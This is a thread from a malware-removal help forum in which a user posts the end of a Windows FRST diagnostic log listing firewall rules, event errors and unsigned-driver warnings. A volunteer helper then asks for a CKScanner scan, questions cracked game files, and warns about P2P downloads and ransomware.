FirewallRules: [TCP Query User{9145617F-9A87-4EC9-96D7-61DC88A0B3AA}C:\program files (x86)\steam\steamapps\common\war thunder\aces.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\war thunder\aces.exe
FirewallRules: [UDP Query User{1DBD55A9-434E-44B6-B95E-626ACAC6C68C}C:\program files (x86)\steam\steamapps\common\war thunder\aces.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\war thunder\aces.exe
FirewallRules: [TCP Query User{9D4BEF11-6C5D-4188-8EE0-809ABFA64121}C:\program files\strogino cs portal\garrys mod\hl2.exe] => (Allow) C:\program files\strogino cs portal\garrys mod\hl2.exe
FirewallRules: [UDP Query User{3C2E631E-9993-43F8-8CA4-9DB4D57A9C8A}C:\program files\strogino cs portal\garrys mod\hl2.exe] => (Allow) C:\program files\strogino cs portal\garrys mod\hl2.exe
FirewallRules: [TCP Query User{23049537-345E-49E4-81F7-7F7208582A6F}C:\games\scrap mechanic v0.1.13\release\scrapmechanic.exe] => (Allow) C:\games\scrap mechanic v0.1.13\release\scrapmechanic.exe
FirewallRules: [UDP Query User{682CAF12-DAA5-457A-AC7A-5608C4A6A8F8}C:\games\scrap mechanic v0.1.13\release\scrapmechanic.exe] => (Allow) C:\games\scrap mechanic v0.1.13\release\scrapmechanic.exe
FirewallRules: [{6199E943-BD95-4404-9F5C-CB98B6795C82}] => (Allow) C:\Program Files (x86)\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe
FirewallRules: [{12CFF736-4509-4656-A63A-5A335B9C9E6D}] => (Allow) C:\Program Files (x86)\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe
FirewallRules: [TCP Query User{6279ECB1-93CB-4DB6-9241-A56B0D65AAC2}C:\users\hp\downloads\call.of.duty.4.modern.warfare.full-rip\call of duty 4 - modern warfare\iw3mp.exe] => (Allow) C:\users\hp\downloads\call.of.duty.4.modern.warfare.full-rip\call of duty 4 - modern warfare\iw3mp.exe
FirewallRules: [UDP Query User{3B26002E-C2A1-406F-A8F8-D34AA6FC865D}C:\users\hp\downloads\call.of.duty.4.modern.warfare.full-rip\call of duty 4 - modern warfare\iw3mp.exe] => (Allow) C:\users\hp\downloads\call.of.duty.4.modern.warfare.full-rip\call of duty 4 - modern warfare\iw3mp.exe
FirewallRules: [TCP Query User{2358DAF6-5B72-40A1-B1CA-289285EF57E4}C:\users\hp\downloads\call.of.duty.4.modern.warfare.full-rip\call of duty 4 - modern warfare\iw3mp.exe] => (Block) C:\users\hp\downloads\call.of.duty.4.modern.warfare.full-rip\call of duty 4 - modern warfare\iw3mp.exe
FirewallRules: [UDP Query User{98626F0A-4AB3-4F44-9DA0-061F4A9B9051}C:\users\hp\downloads\call.of.duty.4.modern.warfare.full-rip\call of duty 4 - modern warfare\iw3mp.exe] => (Block) C:\users\hp\downloads\call.of.duty.4.modern.warfare.full-rip\call of duty 4 - modern warfare\iw3mp.exe
FirewallRules: [{CF5A6A3D-B63C-4355-8AAE-3CD4FB43C095}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\farcry3.exe
FirewallRules: [{C0B968E3-B62A-4EBA-8E08-5C46A97AB7AF}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\farcry3.exe
FirewallRules: [{FE5DDD9A-0167-4DA2-BA44-A5D1D5F76663}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\farcry3_d3d11.exe
FirewallRules: [{B49D92AC-3633-450D-A5FC-57947761C231}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\farcry3_d3d11.exe
FirewallRules: [{754473EF-15C8-49B8-9276-670737590704}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\FC3Updater.exe
FirewallRules: [{92332ADD-4121-4F3B-B11D-1E162442325D}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\FC3Updater.exe
FirewallRules: [{3C2DAF21-42E5-4231-ACA7-C55C1F5EB4A3}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\FC3Editor.exe
FirewallRules: [{A555EEF5-0B5D-47FA-8A66-618D19FDCF59}] => (Allow) C:\Program Files (x86)\Ubisoft\FarCry 3\bin\FC3Editor.exe
FirewallRules: [TCP Query User{988D249A-2BE6-49AE-A0EF-10582F8137AA}C:\program files (x86)\thq\saints row the third\saintsrowthethird.exe] => (Allow) C:\program files (x86)\thq\saints row the third\saintsrowthethird.exe
FirewallRules: [UDP Query User{DA7F5540-AEF2-4539-A9F7-763B01C89BCC}C:\program files (x86)\thq\saints row the third\saintsrowthethird.exe] => (Allow) C:\program files (x86)\thq\saints row the third\saintsrowthethird.exe
FirewallRules: [TCP Query User{B904D007-955B-4916-AC07-455185C1CBA1}C:\users\hp\desktop\backups\samp037_svr_r2-1-1_win32\samp-server.exe] => (Allow) C:\users\hp\desktop\backups\samp037_svr_r2-1-1_win32\samp-server.exe
FirewallRules: [UDP Query User{AD4B4F9E-0691-4533-81B7-A0B996EA51A1}C:\users\hp\desktop\backups\samp037_svr_r2-1-1_win32\samp-server.exe] => (Allow) C:\users\hp\desktop\backups\samp037_svr_r2-1-1_win32\samp-server.exe
FirewallRules: [TCP Query User{9E95F336-F5C5-40D7-861E-83FFF5B31736}C:\users\hp\downloads\7.days.to.die.v13.8.x64-kortal\7daystodie.exe] => (Allow) C:\users\hp\downloads\7.days.to.die.v13.8.x64-kortal\7daystodie.exe
FirewallRules: [UDP Query User{BC3A3A53-32E1-4AB3-A54F-A13AC20B39CC}C:\users\hp\downloads\7.days.to.die.v13.8.x64-kortal\7daystodie.exe] => (Allow) C:\users\hp\downloads\7.days.to.die.v13.8.x64-kortal\7daystodie.exe
FirewallRules: [{0871F91C-7DD5-424B-BE37-D2503FBD346F}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ProjectZomboid\ProjectZomboid32.exe
FirewallRules: [{A756F288-9F2E-45E3-AB78-439D9088BE7B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ProjectZomboid\ProjectZomboid32.exe
FirewallRules: [{3F563ACF-01AC-4FCA-85ED-EA37B3A7F485}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ProjectZomboid\ProjectZomboid64.exe
FirewallRules: [{9379D05C-A530-4CE9-BAF0-A656004573AC}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\ProjectZomboid\ProjectZomboid64.exe
FirewallRules: [TCP Query User{35F69FFE-40DF-4386-AC10-8C0D36D081C6}C:\program files (x86)\pure pool\purepool.exe] => (Allow) C:\program files (x86)\pure pool\purepool.exe
FirewallRules: [UDP Query User{1A92EF19-97C2-4374-80ED-D2D7B7C99700}C:\program files (x86)\pure pool\purepool.exe] => (Allow) C:\program files (x86)\pure pool\purepool.exe
FirewallRules: [TCP Query User{E57231F6-21D9-4A64-8411-A4E0523EDBC1}C:\program files (x86)\steam\steamapps\common\lord of the rings online\lotroclient.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\lord of the rings online\lotroclient.exe
FirewallRules: [UDP Query User{57E65EC3-AF57-4BCA-B676-8496D927DF02}C:\program files (x86)\steam\steamapps\common\lord of the rings online\lotroclient.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\lord of the rings online\lotroclient.exe
FirewallRules: [TCP Query User{550FA9C1-B1E9-4129-81E8-27A356AF91FD}C:\program files (x86)\steam\steamapps\common\projectzomboid\jre\bin\java.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\projectzomboid\jre\bin\java.exe
FirewallRules: [UDP Query User{8875A142-BD97-4C56-B104-22508F4908B3}C:\program files (x86)\steam\steamapps\common\projectzomboid\jre\bin\java.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\projectzomboid\jre\bin\java.exe
FirewallRules: [{116CC472-97BB-45E1-9CA6-8D5CF09DFE59}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{BE10513A-94A9-418D-8A00-16A22A41FB64}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{E82DF90D-8295-4E1C-BC3D-BD07E981363A}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{07FE4630-9E5E-4153-83DD-FE613F95761C}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [TCP Query User{2104931F-149A-44C0-8F85-BDE3C80431BF}C:\program files (x86)\r.g. mechanics\far cry 3\bin\farcry3.exe] => (Allow) C:\program files (x86)\r.g. mechanics\far cry 3\bin\farcry3.exe
FirewallRules: [UDP Query User{B42278A1-1A63-493D-8F51-12BE515F244A}C:\program files (x86)\r.g. mechanics\far cry 3\bin\farcry3.exe] => (Allow) C:\program files (x86)\r.g. mechanics\far cry 3\bin\farcry3.exe
FirewallRules: [TCP Query User{3A9BEA93-7DA6-4947-B1AF-5474A0F818A7}C:\program files (x86)\java\jre1.8.0_111\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_111\bin\javaw.exe
FirewallRules: [UDP Query User{B1D34AE1-BBD3-4ADD-9391-BC89E915C297}C:\program files (x86)\java\jre1.8.0_111\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_111\bin\javaw.exe
FirewallRules: [TCP Query User{CC05D236-5285-44FE-BE3C-412687B6D67C}C:\program files (x86)\java\jre1.8.0_111\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_111\bin\javaw.exe
FirewallRules: [UDP Query User{9BFEA870-D85D-4895-81D4-F4614FF6B0C6}C:\program files (x86)\java\jre1.8.0_111\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_111\bin\javaw.exe
FirewallRules: [TCP Query User{4B3C5454-A646-45BF-A3F0-D4885D8A31CF}C:\program files (x86)\mr dj\borderlands 2 goty\binaries\win32\borderlands2.exe] => (Allow) C:\program files (x86)\mr dj\borderlands 2 goty\binaries\win32\borderlands2.exe
FirewallRules: [UDP Query User{597C47E7-0119-42AC-9391-8817E13875AB}C:\program files (x86)\mr dj\borderlands 2 goty\binaries\win32\borderlands2.exe] => (Allow) C:\program files (x86)\mr dj\borderlands 2 goty\binaries\win32\borderlands2.exe
FirewallRules: [TCP Query User{26DE1C8B-6AF7-43DA-9176-4C5D81BAC221}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{270B20B7-F928-4945-8B3F-8F0B924FD0B1}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [TCP Query User{0853AF47-E170-4B7D-A706-8CD5BC1E0F7F}C:\program files (x86)\ea games\battlefield 2\bf2.exe] => (Allow) C:\program files (x86)\ea games\battlefield 2\bf2.exe
FirewallRules: [UDP Query User{32EC7D15-A105-40A6-82C0-F9CBCD8D7773}C:\program files (x86)\ea games\battlefield 2\bf2.exe] => (Allow) C:\program files (x86)\ea games\battlefield 2\bf2.exe
FirewallRules: [TCP Query User{E13477D5-D782-42C2-A699-34AFA7E078FB}C:\program files (x86)\ea games\battlefield 2\bf2.exe] => (Allow) C:\program files (x86)\ea games\battlefield 2\bf2.exe
FirewallRules: [UDP Query User{B5350CE2-41EB-4585-AFD1-B48671A29251}C:\program files (x86)\ea games\battlefield 2\bf2.exe] => (Allow) C:\program files (x86)\ea games\battlefield 2\bf2.exe
FirewallRules: [{3FB40881-A55B-4AB9-B43C-282E0EA45BA5}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{764C0F3F-D951-4B1B-B83B-B3FE23F920D7}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{C0DDC65F-1D01-4A49-8C7F-E270F8D9E8A2}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{2A59798D-9A43-46F5-A74D-1BFE9281B119}] => (Allow) C:\Windows\SysWOW64\SurfShield.exe
FirewallRules: [{E6A70596-328B-4304-A1E4-D66E080C28C4}] => (Allow) C:\Windows\system32\config\systemprofile\AppData\Local\BrowserAir\Application\BrowserairExec.exe
FirewallRules: [TCP Query User{26C5384F-A329-45CB-9871-71EF2DB92735}C:\users\hp\desktop\texture-studio-master\samp-server.exe] => (Allow) C:\users\hp\desktop\texture-studio-master\samp-server.exe
FirewallRules: [UDP Query User{636ADC8C-9A7E-4C6E-89D8-1D9006A3DF2F}C:\users\hp\desktop\texture-studio-master\samp-server.exe] => (Allow) C:\users\hp\desktop\texture-studio-master\samp-server.exe
 
==================== Restore Points =========================
 
19-04-2017 08:05:40 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215
19-04-2017 08:07:20 Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
19-04-2017 16:00:23 Windows Update
21-04-2017 07:49:48 Windows Update
21-04-2017 10:10:40 Windows Update
21-04-2017 20:00:16 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215
21-04-2017 20:00:59 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24210
21-04-2017 20:01:28 Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
21-04-2017 20:01:56 Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24210
 
==================== Faulty Device Manager Devices =============
 
Name: 
Description: 
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
 
Name: USB Input Device
Description: USB Input Device
Class Guid: {745a17a0-74d3-11d0-b6fe-00a0c90f57da}
Manufacturer: (Standard system devices)
Service: HidUsb
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (04/22/2017 12:17:55 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program samp.exe version 0.0.0.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: a24
 
Start Time: 01d2bb4944768846
 
Termination Time: 9
 
Application Path: C:\Games\Grand Theft Auto SA-MP\samp.exe
 
Report Id: 8fbf5fe5-273c-11e7-8046-acd1b80f54a8
 
Error: (04/22/2017 08:30:58 AM) (Source: EventSystem) (EventID: 4621) (User: )
Description: The COM+ Event System could not remove the EventSystem.EventSubscription object {F55E4282-CE4F-4785-B5C8-29D60709F8AF}-{00000000-0000-0000-0000-000000000000}-{00000000-0000-0000-0000-000000000000}.
Object name: SENS Logon Subscription
Object description: 
The HRESULT was 80070005.
 
Error: (04/21/2017 03:44:16 PM) (Source: Application Error) (EventID: 1005) (User: )
Description: Windows cannot access the file  for one of the following reasons:
there is a problem with the network connection, the disk that the file is stored on, or the storage
drivers installed on this computer; or the disk is missing.
Windows closed the program obs64.exe because of this error.
 
Program: obs64.exe
File: 
 
The error value is listed in the Additional Data section.
User Action
1. Open the file again.
This situation might be a temporary problem that corrects itself when the program runs again.
2.
If the file still cannot be accessed and
- It is on the network,
your network administrator should verify that there is not a problem with the network and that the server can be contacted.
- It is on a removable disk, for example, a floppy disk or CD-ROM, verify that the disk is fully inserted into the computer.
3. Check and repair the file system by running CHKDSK. To run CHKDSK, click Start, click Run, type CMD, and then click OK. At the command prompt, type CHKDSK /F, and then press ENTER.
4. If the problem persists, restore the file from a backup copy.
5. Determine whether other files on the same disk can be opened. If not, the disk might be damaged. If it is a hard disk, contact your administrator or computer hardware vendor for
further assistance.
 
Additional Data
Error value: 00000000
Disk type: 0
 
Error: (04/21/2017 03:44:16 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: obs64.exe, version: 0.0.0.0, time stamp: 0x58be24b4
Faulting module name: MSVCR120.dll, version: 12.0.21005.1, time stamp: 0x524f83ff
Exception code: 0xc000001d
Fault offset: 0x0000000000095c01
Faulting process id: 0x17d4
Faulting application start time: 0x01d2ba9cfcb6a872
Faulting application path: C:\Program Files (x86)\obs-studio\bin\64bit\obs64.exe
Faulting module path: C:\Windows\system32\MSVCR120.dll
Report Id: 3a6b596a-2690-11e7-b252-acd1b80f54a8
 
Error: (04/21/2017 03:43:36 PM) (Source: Application Error) (EventID: 1005) (User: )
Description: Windows cannot access the file  for one of the following reasons:
there is a problem with the network connection, the disk that the file is stored on, or the storage
drivers installed on this computer; or the disk is missing.
Windows closed the program obs64.exe because of this error.
 
Program: obs64.exe
File: 
 
The error value is listed in the Additional Data section.
User Action
1. Open the file again.
This situation might be a temporary problem that corrects itself when the program runs again.
2.
If the file still cannot be accessed and
- It is on the network,
your network administrator should verify that there is not a problem with the network and that the server can be contacted.
- It is on a removable disk, for example, a floppy disk or CD-ROM, verify that the disk is fully inserted into the computer.
3. Check and repair the file system by running CHKDSK. To run CHKDSK, click Start, click Run, type CMD, and then click OK. At the command prompt, type CHKDSK /F, and then press ENTER.
4. If the problem persists, restore the file from a backup copy.
5. Determine whether other files on the same disk can be opened. If not, the disk might be damaged. If it is a hard disk, contact your administrator or computer hardware vendor for
further assistance.
 
Additional Data
Error value: 00000000
Disk type: 0
 
Error: (04/21/2017 03:43:36 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: obs64.exe, version: 0.0.0.0, time stamp: 0x58be24b4
Faulting module name: MSVCR120.dll, version: 12.0.21005.1, time stamp: 0x524f83ff
Exception code: 0xc000001d
Fault offset: 0x0000000000095c01
Faulting process id: 0x1cf8
Faulting application start time: 0x01d2ba9ce4e8b647
Faulting application path: C:\Program Files (x86)\obs-studio\bin\64bit\obs64.exe
Faulting module path: C:\Windows\system32\MSVCR120.dll
Report Id: 229ca3ec-2690-11e7-b252-acd1b80f54a8
 
Error: (04/21/2017 03:43:14 PM) (Source: Application Error) (EventID: 1005) (User: )
Description: Windows cannot access the file  for one of the following reasons:
there is a problem with the network connection, the disk that the file is stored on, or the storage
drivers installed on this computer; or the disk is missing.
Windows closed the program obs64.exe because of this error.
 
Program: obs64.exe
File: 
 
The error value is listed in the Additional Data section.
User Action
1. Open the file again.
This situation might be a temporary problem that corrects itself when the program runs again.
2.
If the file still cannot be accessed and
- It is on the network,
your network administrator should verify that there is not a problem with the network and that the server can be contacted.
- It is on a removable disk, for example, a floppy disk or CD-ROM, verify that the disk is fully inserted into the computer.
3. Check and repair the file system by running CHKDSK. To run CHKDSK, click Start, click Run, type CMD, and then click OK. At the command prompt, type CHKDSK /F, and then press ENTER.
4. If the problem persists, restore the file from a backup copy.
5. Determine whether other files on the same disk can be opened. If not, the disk might be damaged. If it is a hard disk, contact your administrator or computer hardware vendor for
further assistance.
 
Additional Data
Error value: 00000000
Disk type: 0
 
Error: (04/21/2017 03:43:14 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: obs64.exe, version: 0.0.0.0, time stamp: 0x58be24b4
Faulting module name: MSVCR120.dll, version: 12.0.21005.1, time stamp: 0x524f83ff
Exception code: 0xc000001d
Fault offset: 0x0000000000095c01
Faulting process id: 0x1eb0
Faulting application start time: 0x01d2ba9cd7e9f401
Faulting application path: C:\Program Files (x86)\obs-studio\bin\64bit\obs64.exe
Faulting module path: C:\Windows\system32\MSVCR120.dll
Report Id: 15a4987f-2690-11e7-b252-acd1b80f54a8
 
Error: (04/21/2017 03:42:48 PM) (Source: Application Error) (EventID: 1005) (User: )
Description: Windows cannot access the file  for one of the following reasons:
there is a problem with the network connection, the disk that the file is stored on, or the storage
drivers installed on this computer; or the disk is missing.
Windows closed the program obs64.exe because of this error.
 
Program: obs64.exe
File: 
 
The error value is listed in the Additional Data section.
User Action
1. Open the file again.
This situation might be a temporary problem that corrects itself when the program runs again.
2.
If the file still cannot be accessed and
- It is on the network,
your network administrator should verify that there is not a problem with the network and that the server can be contacted.
- It is on a removable disk, for example, a floppy disk or CD-ROM, verify that the disk is fully inserted into the computer.
3. Check and repair the file system by running CHKDSK. To run CHKDSK, click Start, click Run, type CMD, and then click OK. At the command prompt, type CHKDSK /F, and then press ENTER.
4. If the problem persists, restore the file from a backup copy.
5. Determine whether other files on the same disk can be opened. If not, the disk might be damaged. If it is a hard disk, contact your administrator or computer hardware vendor for
further assistance.
 
Additional Data
Error value: 00000000
Disk type: 0
 
Error: (04/21/2017 03:42:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: obs64.exe, version: 0.0.0.0, time stamp: 0x58be24b4
Faulting module name: MSVCR120.dll, version: 12.0.21005.1, time stamp: 0x524f83ff
Exception code: 0xc000001d
Fault offset: 0x0000000000095c01
Faulting process id: 0x1990
Faulting application start time: 0x01d2ba9cc7f7892b
Faulting application path: C:\Program Files (x86)\obs-studio\bin\64bit\obs64.exe
Faulting module path: C:\Windows\system32\MSVCR120.dll
Report Id: 05aada8d-2690-11e7-b252-acd1b80f54a8
 
 
System errors:
=============
Error: (04/22/2017 08:57:10 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: The server {820D63D5-8CFF-46DE-86AF-4997DEDD6DB5} did not register with DCOM within the required timeout.
 
Error: (04/22/2017 08:56:34 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The atksgt service failed to start due to the following error: 
Windows cannot verify the digital signature for this file. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Error: (04/22/2017 08:50:27 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.
 
Error: (04/22/2017 08:50:26 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.
 
Error: (04/22/2017 08:50:26 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.
 
Error: (04/22/2017 08:50:25 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.
 
Error: (04/22/2017 08:50:24 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.
 
Error: (04/22/2017 08:50:24 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.
 
Error: (04/22/2017 08:50:22 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.
 
Error: (04/22/2017 08:50:21 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 40.
 
 
CodeIntegrity:
===================================
  Date: 2017-04-22 08:56:34.806
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2017-04-22 08:56:34.806
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2017-04-22 08:48:57.263
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2017-04-22 08:48:57.247
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2017-04-22 08:38:27.771
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2017-04-22 08:38:27.771
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2017-04-22 08:32:26.489
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2017-04-22 08:32:26.489
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\atksgt.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2017-04-22 08:03:04.835
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Noobzo\GNUpdate\smw.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2017-04-22 08:03:04.833
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Noobzo\GNUpdate\smw.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i3-4005U CPU @ 1.70GHz
Percentage of memory in use: 50%
Total physical RAM: 4032.3 MB
Available physical RAM: 2009.74 MB
Total Virtual: 8062.74 MB
Available Virtual: 5440.58 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:146.39 GB) (Free:87.1 GB) NTFS
Drive d: () (Fixed) (Total:319.28 GB) (Free:319.18 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 397A8933)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=146.4 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=319.3 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================

Edited by Khazard, 22 April 2017 - 08:03 AM.

  • 0

#4
pystryker


    Trusted Helper

  • Malware Removal
  • 3,912 posts
Hello :)

Scan with CKScanner


Download CKScanner from here.

Important: Save it to your desktop.

Double-click CKScanner.exe and click Search For Files. (If you have Windows Vista / Windows 7 / Windows 8, please right-click CKScanner.exe and select Run as Administrator.)

After a very short time, when the cursor hourglass disappears, click Save List To File.

A message box will verify that the file is saved.

Double-click the CKFiles.txt icon on your desktop and copy/paste the contents in your next reply.
  • 0

#5
Khazard


    New Member

  • Topic Starter
  • Member
  • Pip
  • 9 posts
CKScanner 2.5 - Additional Security Risks - These are not necessarily bad
c:\games\grand theft auto sa-mp\data\decision\craig\crack1.ped
c:\program files (x86)\steam\steamapps\common\projectzomboid\zombie\erosion\categories\streetcracks$categorydata.class
c:\program files (x86)\steam\steamapps\common\projectzomboid\zombie\erosion\categories\streetcracks.class
c:\program files (x86)\steam\steamapps\common\projectzomboid\zombie\erosion\categories\wallcracks$categorydata.class
c:\program files (x86)\steam\steamapps\common\projectzomboid\zombie\erosion\categories\wallcracks.class
scanner sequence 3.BC.11.LEAPL0
 ----- EOF ----- 

  • 0

#6
pystryker


    Trusted Helper

  • Malware Removal
  • 3,912 posts
Cracked - Illegal Software

May I draw your attention to the Terms of Service, which you should have read before posting for help.
The section here explains why we bring this to your attention.

If you wish to receive help from us, you must remove any and all of the following from your computer:
  • Illegal software
  • Cracked software
  • Illegal software key generators
If you do not remove the software, your thread will be closed. You will need to post a new set of logs if you decide to remove the software.
  • 0

#7
Khazard


    New Member

  • Topic Starter
  • Member
  • Pip
  • 9 posts

I assure you that those logs do not show any sort of cracked software, rather they are files for games that portray something in the game.

crack1.ped is an animation within a game, while streetcracks and wallcracks are, like their names suggest, cracks in walls and/or streets.


  • 0

#8
pystryker


    Trusted Helper

  • Malware Removal
  • 3,912 posts

I assure you that those logs do not show any sort of cracked software, rather they are files for games that portray something in the game.
crack1.ped is an animation within a game, while streetcracks and wallcracks are, like their names suggest, cracks in walls and/or streets.


Hello :)

Ok, thank you for explaining those files.
 

3dmgame-7.days.to.die.alpha.13.6.steam.edition.x64.cracked-3dm


What about this one?
  • 0

#9
Khazard


    New Member

  • Topic Starter
  • Member
  • Pip
  • 9 posts

I uninstalled that quite a long time ago, and I think files related to it still remained.


  • 0

#10
pystryker


    Trusted Helper

  • Malware Removal
  • 3,912 posts

I uninstalled that quite a long time ago, and I think files related to it still remained.


Hello :)

Ok, I can remove those that show as we deal with the error that's popping up. Let's get started. :) :thumbsup:


Please disable your antivirus for the duration of my instructions. Don't forget to re-enable it after you have completed the steps.

Step 1: P2P Warning

The Dangers of P2P Programs

I noticed that you have a P2P file sharing program on your computer. I cannot stress highly enough the danger in using these types of programs. P2P programs are one of the major avenues of infection these days. The files downloaded with these programs are more likely than not infected with trojans, malware, rootkits, etc.

You run the risk of getting an infection that can compromise your sensitive data, such as financial records, personal information, etc. That is just the infection aspect of using P2P programs. You also run the risk of possible arrest, fines, or in severe cases, jail time for illegal downloading of copyrighted material.

There are also new infections out there such as CryptoWall 3.0 and CryptoLocker. When infected with these, all of your personal files on any drive connected to your computer will be affected. These infections copy all your files, encrypt them, and then delete the originals, leaving you with the encrypted copies. You are then presented with a screen telling you you have a certain amount of time to pay the ransom for the decryption code to decrypt your files. Even if you pay the ransom, their decryption process usually results in corrupt and unusable files.

There is nothing we can do to decrypt the files, as they use very sophisticated encryption techniques. Please consider this when using P2P programs. Malware and ransomware writers use P2P to spread their infections.

I guarantee you, that if you continue to use file sharing programs, your machine will get infected again.


Here are some information sources about the dangers of P2P programs:

FBI - Peer to Peer Scams

USA Today Article on P2P Programs

